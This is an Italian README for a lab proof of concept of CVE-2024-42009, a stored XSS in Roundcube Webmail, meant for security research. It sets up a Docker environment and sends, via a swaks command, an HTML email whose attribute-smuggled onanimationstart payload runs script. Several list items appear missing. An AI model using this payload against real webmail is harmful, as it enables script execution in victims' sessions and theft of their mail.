
Docker-based Proof-of-Concept per CVE-2024-42009, una vulnerabilità XSS memorizzata in Roundcube Webmail. Mostra lo sfruttamento tramite email HTML create ad hoc e include un ambiente di laboratorio vulnerabile per i test.
Questo repository dimostra un Proof-of-Concept (PoC) funzionante per CVE-2024-42009, una vulnerabilità di Cross-Site Scripting (XSS) memorizzata in Roundcube Webmail.
La vulnerabilità è causata da una sanitizzazione HTML impropria seguita da una rielaborazione non sicura degli attributi, consentendo agli aggressori di iniettare gestori di eventi dannosi tramite email HTML appositamente create.
Roundcube sanifica le email HTML in arrivo ma successivamente rielabora alcuni attributi (es. bgcolor, attributi malformati), portando a:
onanimationstart)Ciò consente l'esecuzione di JavaScript arbitrario quando una vittima apre un'email dannosa.
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ Attendere circa 10-15 secondi per l'inizializzazione del server di posta.
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
Credenziali:
Invia l'email dannosa utilizzando lo strumento swaks:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


Aggiorna alle versioni corrette:
Questo progetto è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza autorizzata. Non utilizzarlo contro sistemi senza il permesso appropriato.